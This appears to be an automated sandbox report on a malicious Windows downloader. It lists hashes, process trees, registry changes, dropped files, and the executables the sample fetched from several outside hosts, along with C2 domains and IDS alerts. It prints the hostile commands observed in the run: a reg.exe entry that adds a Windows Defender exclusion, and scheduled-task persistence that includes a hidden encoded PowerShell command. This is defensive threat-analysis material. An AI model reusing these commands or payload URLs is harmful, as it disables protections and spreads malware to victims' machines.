| File name: | New Text Document.exe |
| Full analysis: | https://app.any.run/tasks/d62d802e-eef5-4a11-9e8d-34b88b5e0afd |
| Verdict: | Malicious activity |
| Threats: | Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. |
| Analysis date: | November 25, 2023, 22:47:43 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | A239A27C2169AF388D4F5BE6B52F272C |
| SHA1: | 0FEB9A0CD8C25F01D071E9B2CFC2AE7BD430318C |
| SHA256: | 98E895F711226A32BFAB152E224279D859799243845C46E550C2D32153C619FC |
| SSDEEP: | 48:YqYHO2f7Frk70zDJZZJOfTHH/rPmckulbfSqXSfbNtm:27Jlm/6ypf6zNt |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (7.4) |
| .exe | | | Win32 Executable (generic) (5.1) |
| .exe | | | Generic Win/DOS Executable (2.2) |
| .exe | | | DOS Executable Generic (2.2) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2023:09:30 18:32:57+02:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 11 |
| CodeSize: | 2048 |
| InitializedDataSize: | 2048 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x268e |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows command line |
| FileVersionNumber: | 0.0.0.0 |
| ProductVersionNumber: | 0.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| FileDescription: | |
| FileVersion: | 0.0.0.0 |
| InternalName: | New Text Document.exe |
| LegalCopyright: | |
| OriginalFileName: | New Text Document.exe |
| ProductVersion: | 0.0.0.0 |
| AssemblyVersion: | 0.0.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 120 | "C:\Windows\System32\a\setup.exe" | C:\Windows\System32\a\setup.exe | — | New Text Document.exe | |||||||||||
User: Administrator Company: Igor Pavlov Integrity Level: HIGH Description: 7z Setup SFX Exit code: 0 Version: 9.20 Modules
| |||||||||||||||
| 124 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files\rXjduNqsU" /t REG_DWORD /d 0 | C:\Windows\System32\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 272 | schtasks /run /I /tn "gAFDjcaIt" | C:\Windows\System32\schtasks.exe | — | Csfhhtw.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 272 | C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Local\Temp\main\main.bat" /S" | C:\Windows\System32\cmd.exe | — | conhost.exe | |||||||||||
User: Administrator Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 296 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | hv.exe | ||||||||||||
User: Administrator Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft .NET Assembly Registration Utility Exit code: 0 Version: 4.8.3761.0 built by: NET48REL1 Modules
| |||||||||||||||
| 316 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f | C:\Windows\System32\schtasks.exe | — | XRJNZC.exe | |||||||||||
User: Administrator Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 316 | schtasks /CREATE /TN "gAFDjcaIt" /SC once /ST 19:55:01 /F /RU "Administrator" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | C:\Windows\System32\schtasks.exe | — | Csfhhtw.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 600 | schtasks /CREATE /TN "bbPqNtaaeFeEtSKaKR" /SC once /ST 22:50:00 /RU "SYSTEM" /TR "\"C:\Users\Administrator\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\Csfhhtw.exe\" 8N /yhsite_iddKP 525403 /S" /V1 /F | C:\Windows\System32\schtasks.exe | — | Install.exe | |||||||||||
User: Administrator Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 644 | schtasks /CREATE /TN "KnGwbHArRBeaeV" /F /xml "C:\Program Files\bNpaxMIFBfOU2\HsUKMYN.xml" /RU "SYSTEM" | C:\Windows\System32\schtasks.exe | — | vJmWuIm.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 644 | "C:\Windows\System32\raserver.exe" | C:\Windows\System32\raserver.exe | wininit.exe | ||||||||||||
User: Administrator Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Remote Assistance COM Server Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1668) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{4C240548-76A4-4DCB-A544-A3C7FEE93C3B}\{51939944-C9C5-40E4-ACD2-D7EB6F9A7CEC} |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (1668) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{4C240548-76A4-4DCB-A544-A3C7FEE93C3B} |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (1668) wmpnscfg.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{E47CEA19-4A8A-4A30-A55E-C1644CF5BD24} |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\2\52C64B7E |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\2 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD |
| Operation: | write | Name: | Blob |
Value: 530000000100000040000000303E301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0301B060567810C010330123010060A2B0601040182373C0101030200C0190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F0B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D002000520033000000620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B1400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA953030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD0F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB090000000100000054000000305206082B0601050507030206082B06010505070303060A2B0601040182370A030406082B0601050507030406082B0601050507030606082B0601050507030706082B0601050507030106082B060105050703082000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD |
| Operation: | write | Name: | Blob |
Value: 040000000100000010000000C5DFB849CA051355EE2DBA1AC33EB028090000000100000054000000305206082B0601050507030206082B06010505070303060A2B0601040182370A030406082B0601050507030406082B0601050507030606082B0601050507030706082B0601050507030106082B060105050703080F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA9531400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B0B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D002000520033000000190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F530000000100000040000000303E301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0301B060567810C010330123010060A2B0601040182373C0101030200C02000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | delete value | Name: | ProxyBypass |
Value: 0 | |||
| (PID) Process: | (1788) New Text Document.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | delete value | Name: | IntranetName |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1788 | New Text Document.exe | C:\Windows\system32\a\home.exe | executable | |
MD5:7E839D41A7D1178D96158EE3AE28779F | SHA256:BBD1DE6202CBF7B144035B2F82D48567C36CC77909A6F8A52604BACDFD80449F | |||
| 120 | setup.exe | C:\Users\ADMINI~1\AppData\Local\Temp\7zSA4F2.tmp\Install.exe | executable | |
MD5:94E9F9491BE9AA9266961628A3A620EC | SHA256:47431DF1D7089E7C2EB37B61325ADC933D17C40A5F47F518B9B673C090CB0146 | |||
| 2468 | macindas2.1.exe | C:\Users\ADMINI~1\AppData\Local\Temp\pujipqto.exe | executable | |
MD5:B753F141F10FFA94B5A235055B33F22A | SHA256:1767016765B62256D3F7E1A54C167E1CC077061A54A000A4047EC26E4D0C07DA | |||
| 3040 | home.exe | C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe | executable | |
MD5:7E839D41A7D1178D96158EE3AE28779F | SHA256:BBD1DE6202CBF7B144035B2F82D48567C36CC77909A6F8A52604BACDFD80449F | |||
| 3040 | home.exe | C:\Users\ADMINI~1\AppData\Local\Temp\FANBooster131\FANBooster131.exe | executable | |
MD5:7E839D41A7D1178D96158EE3AE28779F | SHA256:BBD1DE6202CBF7B144035B2F82D48567C36CC77909A6F8A52604BACDFD80449F | |||
| 1064 | Install.exe | C:\Users\ADMINI~1\AppData\Local\Temp\7zSA62A.tmp\Install.exe | executable | |
MD5:0209C363D4E036A99793F4C18ED2FED7 | SHA256:33C9DFCF4E6899C831FEE22E8AD94D21B546F25C7BC259FD2B8870B7375F0416 | |||
| 3040 | home.exe | C:\Users\Administrator\AppData\Local\MaxLoonaFest131\MaxLoonaFest131.exe | executable | |
MD5:7E839D41A7D1178D96158EE3AE28779F | SHA256:BBD1DE6202CBF7B144035B2F82D48567C36CC77909A6F8A52604BACDFD80449F | |||
| 3040 | home.exe | C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk | binary | |
MD5:67C0FF73AEE6CB9B7939B6D6D9EEA5F7 | SHA256:FEAC2BA01E9DE97FD487485B16BF9B49039B3824CEA070DEB074D02F49E4E010 | |||
| 1788 | New Text Document.exe | C:\Windows\system32\a\new.exe | executable | |
MD5:0179EEC24965822EA41AF4447D767961 | SHA256:9BDC8FB2ECB47ADC2E5CF1C3BBE407D7EDD5309E747020007388E70EEE9065B6 | |||
| 3040 | home.exe | C:\Users\ADMINI~1\AppData\Local\Temp\rise131M9Asphalt.tmp | text | |
MD5:01EDA94FF1E6C9F2E2C745A598D80E56 | SHA256:844582387DB707638E5876B995DF7601C5F2A134BCE646A2975F9117C40625BA | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1788 | New Text Document.exe | GET | 200 | 109.107.182.45:80 | http://109.107.182.45/trend/home.exe | unknown | executable | 1.47 Mb | unknown |
1788 | New Text Document.exe | GET | 200 | 91.106.207.26:80 | http://hblmbtbm.beget.tech/525403/setup.exe | unknown | executable | 7.15 Mb | unknown |
1788 | New Text Document.exe | GET | 200 | 159.223.189.221:80 | http://159.223.189.221/new.exe | unknown | executable | 123 Kb | unknown |
1788 | New Text Document.exe | GET | 200 | 159.223.189.221:80 | http://159.223.189.221/test.exe | unknown | executable | 502 Kb | unknown |
1788 | New Text Document.exe | GET | 200 | 159.223.189.221:80 | http://159.223.189.221/Server.exe | unknown | executable | 23.5 Kb | unknown |
1788 | New Text Document.exe | GET | 200 | 159.223.189.221:80 | http://159.223.189.221/updates.exe | unknown | executable | 2.87 Mb | unknown |
1788 | New Text Document.exe | GET | 200 | 5.42.64.35:80 | http://5.42.64.35/timeSync.exe | unknown | executable | 288 Kb | unknown |
1788 | New Text Document.exe | GET | 200 | 172.245.208.19:80 | http://172.245.208.19/450/asusns.exe | unknown | executable | 601 Kb | unknown |
1788 | New Text Document.exe | GET | 200 | 77.222.40.238:80 | http://kreedcssg3.temp.swtest.ru/vsc.exe | unknown | executable | 7.32 Mb | unknown |
1788 | New Text Document.exe | GET | 200 | 172.245.208.19:80 | http://172.245.208.19/380/sihost.exe | unknown | executable | 632 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
868 | svchost.exe | 95.101.148.135:80 | — | Akamai International B.V. | NL | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
868 | svchost.exe | 95.101.200.141:80 | armmf.adobe.com | AKAMAI-AS | DE | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1788 | New Text Document.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
1788 | New Text Document.exe | 91.106.207.26:80 | hblmbtbm.beget.tech | Beget LLC | RU | unknown |
1788 | New Text Document.exe | 109.107.182.45:80 | — | Cloud assets LLC | RU | unknown |
1788 | New Text Document.exe | 159.223.189.221:80 | — | DIGITALOCEAN-ASN | US | unknown |
1788 | New Text Document.exe | 103.224.247.210:443 | swamini.in | Web Werks India Pvt. Ltd. | IN | unknown |
3040 | home.exe | 194.49.94.152:50500 | — | Enes Koken | DE | malicious |
Domain | IP | Reputation |
|---|---|---|
armmf.adobe.com |
| whitelisted |
urlhaus.abuse.ch |
| whitelisted |
hblmbtbm.beget.tech |
| unknown |
swamini.in |
| malicious |
ipinfo.io |
| shared |
db-ip.com |
| whitelisted |
needforrat.hopto.org |
| unknown |
tomwallner.icu |
| unknown |
galandskiyher5.com |
| malicious |
kreedcssg3.temp.swtest.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1788 | New Text Document.exe | A Network Trojan was detected | ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
1788 | New Text Document.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
1788 | New Text Document.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1788 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1788 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
1788 | New Text Document.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
1788 | New Text Document.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1788 | New Text Document.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
1788 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1788 | New Text Document.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
Process | Message |
|---|---|
AppLaunch.exe | tkykpxb5q |
AppLaunch.exe | ta6i00ab5 |
AppLaunch.exe | ta6i00ab5 |
AppLaunch.exe | tztnv58p7 |
AppLaunch.exe | t53kcp8uy |
AppLaunch.exe | tsoj4h2ss |
AppLaunch.exe | tztnv58p7 |
AppLaunch.exe | ti0wqwyco |
AppLaunch.exe | tt6rygsbi |
AppLaunch.exe | ta6i00ab5 |